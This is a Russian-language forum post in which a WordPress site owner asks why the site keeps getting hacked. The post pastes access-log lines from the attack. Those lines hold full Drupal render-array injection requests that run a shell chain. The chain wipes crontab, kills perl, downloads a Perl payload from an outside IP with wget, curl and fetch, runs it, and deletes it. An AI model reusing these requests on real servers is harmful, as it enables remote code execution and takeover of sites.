Взламывают сайт на WP
Приветствую.
Хочу разобраться в чем причина, вообщем взламывают сайт с регулярной частотой, но не могу найти причину. Восстанавливаю из бекапа, а его опять ломают.
Вот что в логах:
После такого запроса на сайте появляется ошибка Warning: trim() expects parameter 1 to be string, array given in
Не знаю что там этот тип подбирает но у него это удачно получается, может есть у кого какие соображения на этот счет
Хочу разобраться в чем причина, вообщем взламывают сайт с регулярной частотой, но не могу найти причину. Восстанавливаю из бекапа, а его опять ломают.
Вот что в логах:
Код:
31.184.194.114 - - [21/Mar/2019:06:36:26 +0300] "POST /?q=user/password&name[%23post_render][]=passthru&name[%23markup]=crontab%20-r%20;%20killall%20-9%20perl%20;%20cd%20/tmp/%20;%20wget%20http://31.184.195.114/index.log.2018.06.26%20;%20perl%20index.log.2018.06.26%20;%20rm%20-rf%20index.log.*%20;%20fetch%20http://31.184.195.114/index.log.2018.06.26%20;%20lwp-download%20http://31.184.195.114/index.log.2018.06.26%20;%20curl%20-O%20http://31.184.195.114/index.log.2018.06.26%20;%20perl%20index.log.2018.06.26%20;%20rm%20-rf%20index.log.*%20;%20crontab%20-r&name[%23type]=markup HTTP/1.1" 200 11092 "-" "Ruby"
31.184.194.114 - - [21/Mar/2019:06:36:29 +0300] "POST /?q=file/ajax/name/%23value/ HTTP/1.1" 200 20301 "-" "Ruby"
31.184.194.114 - - [21/Mar/2019:06:36:31 +0300] "POST /user/password/?name[%23post_render][]=passthru&name[%23markup]=crontab%20-r%20;%20killall%20-9%20perl%20;%20cd%20/tmp/%20;%20wget%20http://31.184.195.114/index.log.2018.06.26%20;%20perl%20index.log.2018.06.26%20;%20rm%20-rf%20index.log.*%20;%20fetch%20http://31.184.195.114/index.log.2018.06.26%20;%20lwp-download%20http://31.184.195.114/index.log.2018.06.26%20;%20curl%20-O%20http://31.184.195.114/index.log.2018.06.26%20;%20perl%20index.log.2018.06.26%20;%20rm%20-rf%20index.log.*%20;%20crontab%20-r&name[%23type]=markup HTTP/1.1" 404 9529 "-" "Ruby"
31.184.194.114 - - [21/Mar/2019:06:36:32 +0300] "POST /file/ajax/name/%23value/ HTTP/1.1" 404 9420 "-" "Ruby"
31.184.194.114 - - [21/Mar/2019:06:36:34 +0300] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 404 9420 "-" "Ruby"Код:
/var/www/admin/data/www/site.ru/wp-includes/class-wp-query.php on line 755Не знаю что там этот тип подбирает но у него это удачно получается, может есть у кого какие соображения на этот счет